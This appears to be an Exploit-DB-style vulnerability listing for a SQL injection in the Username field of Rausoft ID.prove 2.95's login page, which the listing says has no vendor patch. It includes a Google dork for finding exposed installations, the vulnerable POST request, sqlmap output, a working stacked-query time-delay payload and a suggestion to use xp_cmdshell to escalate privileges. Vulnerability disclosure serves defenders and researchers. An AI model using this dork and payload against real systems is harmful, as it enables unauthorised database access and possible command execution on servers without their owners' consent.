header-logo
Suggest Exploit
vendor:
ID.prove
by:
Ilya Timchenko, Mercedes pay S.A.
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: ID.prove
Affected Version From: 2.95
Affected Version To: 2.95
Patch Exists: NO
Related CWE:
CPE: a:rausoft:id.prove:2.95
Metasploit:
Other Scripts:
Platforms Tested: Windows 2016
2018

Rausoft ID.prove 2.95 – ‘Username’ SQL injection

An issue was discovered in Rausoft ID.prove 2.95. The login page with a field "Username" is vulnerable to the SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation.

Mitigation:

The vendor has not provided a specific mitigation for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Rausoft ID.prove 2.95 - 'Username' SQL injection
# Google Dork: inurl:IdproveWebclient
# Date: 2018-09-26
# Exploit Author: Ilya Timchenko, Mercedes pay S.A.
# Vendor Homepage: https://www.idprove.de
# Software Link: https://www.idprove.de/english/index.php?option=com_content&view=article&id=17&Itemid=3
# Version: 2.95
# Tested on: Windows 2016
# CVE : N/A
# Description: An issue was discovered in Rausoft ID.prove 2.95. The login page with a field "Username" 
# https://<<FQDN>>/IdproveWebclient/Account/Login?ReturnUrl=%2fIdproveWebclient%2fEinzelsuche --data="__RequestVerificationToken=<<dynamic_token_value>>&Username=a&PasswordTemp=a"
# is vulnerable to the SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. 
# Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation.

# SQLmap output:
# Parameter: #1* ((custom) POST)
# Type: stacked queries
# Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: __RequestVerificationToken=<<dynamic_token_value>>&Username=a';WAITFOR DELAY '0:0:5'--&PasswordTemp=a